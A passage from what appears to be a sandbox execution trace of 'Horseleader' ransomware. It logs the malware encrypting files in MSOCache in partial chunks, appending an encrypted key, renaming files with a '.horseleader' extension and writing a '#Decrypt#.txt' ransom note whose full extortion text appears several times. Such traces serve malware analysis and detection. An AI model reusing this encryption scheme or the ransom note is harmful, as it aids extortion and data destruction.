Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0223.817] GetProcessHeap () returned 0x780000 [0223.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.817] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0223.817] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Windows") returned -1 [0223.817] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0223.817] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".horseleader") returned 0x0 [0223.817] lstrcmpW (lpString1="VisiorWW.cab", lpString2="#Decrypt#.txt") returned 1 [0223.817] lstrcmpW (lpString1="VisiorWW.cab", lpString2="_uninstalling_.png") returned 1 [0223.817] lstrlenW (lpString=".testttjffg") returned 11 [0223.817] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab", lpSrch=".testttjffg") returned 0x0 [0223.817] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.818] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.818] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.819] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0223.819] StrStrW (lpFirst="VisiorWW.cab", lpSrch=".txt") returned 0x0 [0223.819] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=195011319) returned 1 [0223.819] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.819] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.829] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.829] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.829] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5cfa97b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.829] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.834] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.834] WriteFile 
(in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.835] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb9f52f7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.835] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.838] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.839] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.839] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.839] CloseHandle (hObject=0x21c) returned 1 [0223.840] GetProcessHeap () returned 0x780000 [0223.840] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.840] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.horseleader") returned 91 [0223.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.horseleader")) returned 1 [0223.841] GetProcessHeap () returned 0x780000 [0223.841] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.841] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0223.841] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Windows") returned -1 [0223.841] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0223.841] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".horseleader") returned 0x0 [0223.841] lstrcmpW (lpString1="VisiorWW.msi", lpString2="#Decrypt#.txt") returned 1 [0223.841] lstrcmpW (lpString1="VisiorWW.msi", lpString2="_uninstalling_.png") returned 1 [0223.841] lstrlenW (lpString=".testttjffg") returned 11 [0223.841] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi", lpSrch=".testttjffg") returned 0x0 [0223.841] 
CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.841] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.842] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0223.842] StrStrW (lpFirst="VisiorWW.msi", lpSrch=".txt") returned 0x0 [0223.842] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=12060672) returned 1 [0223.842] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.842] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.889] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.889] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.890] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5bdc00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.890] ReadFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.894] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.894] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.895] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb7b800, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.895] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.899] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0223.899] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.900] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.900] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) 
returned 1 [0223.900] CloseHandle (hObject=0x21c) returned 1 [0223.902] GetProcessHeap () returned 0x780000 [0223.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.902] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.horseleader") returned 91 [0223.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.horseleader")) returned 1 [0223.903] GetProcessHeap () returned 0x780000 [0223.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.903] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0223.903] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Windows") returned -1 [0223.903] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0223.903] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".horseleader") returned 0x0 [0223.903] lstrcmpW (lpString1="VisiorWW.xml", lpString2="#Decrypt#.txt") returned 1 [0223.903] 
lstrcmpW (lpString1="VisiorWW.xml", lpString2="_uninstalling_.png") returned 1 [0223.903] lstrlenW (lpString=".testttjffg") returned 11 [0223.903] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml", lpSrch=".testttjffg") returned 0x0 [0223.903] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0223.903] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0223.903] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0223.904] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0223.904] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".txt") returned 0x0 [0223.904] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=8723) returned 1 [0223.904] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x2213, lpOverlapped=0x0) returned 1 [0223.909] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0223.909] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x2213, lpOverlapped=0x0) returned 1 [0223.912] SetFilePointerEx (in: hFile=0x21c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0223.912] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0223.912] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0223.913] CloseHandle (hObject=0x21c) returned 1 [0223.913] GetProcessHeap () returned 0x780000 [0223.913] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0223.913] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.horseleader") returned 91 [0223.913] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.horseleader")) returned 1 [0223.914] GetProcessHeap () returned 0x780000 [0223.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0223.914] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, 
dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 0 [0223.914] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0223.914] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0223.914] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0223.915] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0223.915] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0223.916] lstrlenA (lpString="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") returned 1368 [0223.916] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0223.916] CloseHandle (hObject=0x1cc) returned 1 [0223.917] GetProcessHeap () returned 0x780000 [0223.917] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0223.917] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0223.917] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0223.917] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\#Decrypt#.txt") returned 39 [0223.917] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0223.918] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to 
our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0223.918] WriteFile (in: hFile=0x164, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0223.920] lstrlenA (lpString="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") returned 1368 [0223.920] WriteFile (in: hFile=0x164, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0223.920] CloseHandle (hObject=0x164) returned 1 [0223.920] GetProcessHeap () returned 0x780000 [0223.920] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0223.920] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 0 [0223.920] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0223.920] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\#Decrypt#.txt") returned 29 [0223.921] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\#Decrypt#.txt" (normalized: "c:\\msocache\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0223.921] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - 
